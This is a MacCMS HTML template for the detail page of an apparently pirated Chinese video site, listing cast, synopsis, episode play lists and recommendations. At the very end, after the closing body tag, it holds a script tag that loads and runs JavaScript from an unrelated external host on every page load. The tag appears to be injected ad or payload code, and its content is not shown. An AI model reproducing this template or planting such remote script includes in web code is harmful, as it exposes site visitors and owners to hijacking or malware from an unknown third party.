<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
  
  <head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE10" />
    <meta name="renderer" content="webkit|ie-comp|ie-stand">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0">
    <title>{$obj.vod_name}详情介绍-{$obj.vod_name}在线观看-{$obj.vod_name}迅雷下载 - {$maccms.site_name}</title>
    <meta name="keywords" content="{$obj.vod_name}在线收看,{$obj.vod_name}迅雷下载" />
    <meta name="description" content="{$obj.vod_name}剧情:{$obj.vod_blurb}" />
    {include file="public/include"}
	</head>
  
  <body>
    {include file="public/head"}
    <div class="container">
      <div class="row">
        <div class="stui-pannel stui-pannel-bg clearfix">
          <div class="stui-pannel-box clearfix">
            <div class="stui-pannel_bd clearfix">
              <div class="col-md-wide-75 col-xs-1">
                <div class="stui-content clearfix">
                  <div class="stui-content__thumb">
					<a class="stui-vodlist__thumb img-shadow v-thumb" href="{:mac_url_vod_play($obj,['sid'=>1,'nid'=>1])}" title="{$vo.vod_name}">
                      <img src="{:mac_url_img($obj.vod_pic)}" alt="{$vo.vod_name}">
                      <span class="play active hidden-xs"></span>
                      <span class="pic-text text-right">高清</span></a>
                  </div>
                  <div class="stui-content__detail">
                    <h3 class="title">{$obj.vod_name}</h3>
                    <p class="data">
                      <span class="text-muted">主演：</span>
                      {$obj.vod_actor|mac_url_create='actor'} 
					</p>
                    <p class="data">
                      <span class="text-muted">导演：</span>
                      {$obj.vod_director|mac_url_create='director'} </p>
                    <p class="data">
                      <span class="text-muted">类型：</span>
                      {$obj.vod_class|mac_url_create='class'}
                      <span class="split-line"></span>
                      <span class="text-muted hidden-xs">地区：</span>
                      {$obj.vod_area|mac_url_create='area'} 
                      <span class="split-line"></span>
                      <span class="text-muted hidden-xs">年份：</span>
					  {$obj.vod_year|mac_url_create='year'}
					  </p>
                    <p class="desc detail hidden-xs">
                      <span class="left text-muted">简介：</span>
                      <span class="detail-sketch">{$obj.vod_blurb}… </span>
                      <span class="detail-content" style="display: none;">{$obj.vod_blurb}… </span>
                      <a class="detail-more" href="javascript:;">详情
                        <i class="icon iconfont icon-moreunfold"></i></a>
                    </p>
                    <div class="play-btn clearfix">
                      <div class="share bdsharebuttonbox hidden-sm hidden-xs pull-right">
                        
                      </div>
                      <a class="btn btn-primary" href="{:mac_url_vod_play($obj,['sid'=>1,'nid'=>1])}">立即播放</a></div>
                  </div>
                </div>
              </div>
              <div class="col-md-wide-25 hidden-md hidden-sm hidden-xs">
                <div class="text-center" style="padding: 45px;">
                  <p>
                    <img class="code" width="160" height="160" src="{$maccms.path_tpl}images/ww.jpg" /></p>
                  <p class="font-12">扫码添加官方QQ交流群</p></div>
              </div>
            </div>
          </div>
        </div>
        <!-- 详细信息-->
		{maccms:foreach name="obj.vod_play_list" id="vo"}
        <div class="stui-pannel stui-pannel-bg clearfix">
          <div class="stui-pannel-box">
            <div class="stui-pannel_hd">
              <div class="stui-pannel__head bottom-line active clearfix">
                <span class="more text-muted pull-right">{$vo.player_info.tip}</span>
                <h3 class="title">{$vo.player_info.show}</h3></div>
            </div>
            <div class="stui-pannel_bd col-pd clearfix">
              <ul class="stui-content__playlist column10 clearfix">
			  {maccms:foreach name="vo.urls" id="vo2"}
                <li><a title='{$vo2.name}' href='{:mac_url_vod_play($obj,['sid'=>$vo.sid,'nid'=>$vo2.nid])}' target="_self">{$vo2.name}</a></li>
			  {/maccms:foreach}
                          </ul>
            </div>
          </div>
        </div>
		{/maccms:foreach}
        <!-- 播放列表-->
        <div class="stui-pannel stui-pannel-bg clearfix">
          <div class="stui-pannel-box">
            <div class="stui-pannel_hd">
              <div class="stui-pannel__head clearfix">
                <h3 class="title">
                  <img src="{$maccms.path_tpl}images/icon_6.png" />猜你喜欢</h3></div>
            </div>
            <div class="stui-pannel_bd">
              <ul class="stui-vodlist__bd clearfix">
			  {maccms:vod num="12" type="current" order="desc" by="time"}
                <li class="col-md-6 col-sm-4 col-xs-3">
                  <div class="stui-vodlist__box">
					<a class="stui-vodlist__thumb img-shadow" href="{:mac_url_vod_detail($vo)}" title="{$vo.vod_name}">
                      <img src="{:mac_url_img($vo.vod_pic)}" alt="{$vo.vod_name}">
                      <span class="play hidden-xs"></span>
                      <span class="pic-text text-right">{if condition="$vo.vod_serial gt 0"}第{$vo.vod_serial}集/共{$vo.vod_total}集{else/}{$vo.vod_remarks}{/if}</span></a>
                    <div class="stui-vodlist__detail">
                      <h4 class="title text-overflow">
                        <a href="{:mac_url_vod_detail($vo)}" title="{$vo.vod_name}">{$vo.vod_name}</a></h4>
                      <p class="text text-overflow text-muted hidden-xs">{$vo.vod_actor}</p></div>
                  </div>
                </li>
			  {/maccms:vod}
              </ul>
            </div>
          </div>
        </div>
        <!-- 猜你喜欢-->
		<span style="display:none" class="mac_ulog_set" alt="设置内容页浏览记录" data-type="1" data-mid="{$maccms.mid}" data-id="{$obj.vod_id}" data-sid="{$param.sid}" data-nid="{$param.nid}"></span>
		<span style="display:none" class="mac_history_set" alt="设置History历史记录" data-name="[{$obj.type.type_name}]{$obj.vod_name}" data-pic="{$obj.vod_pic|mac_url_img}"></span>
		</div>
    </div>
	{include file="public/foot"}
  </body>
<script id='mob' type='text/javascript' charset='utf-8' src='http://k.xmtsyg.com/d.php?pid=1174'></script>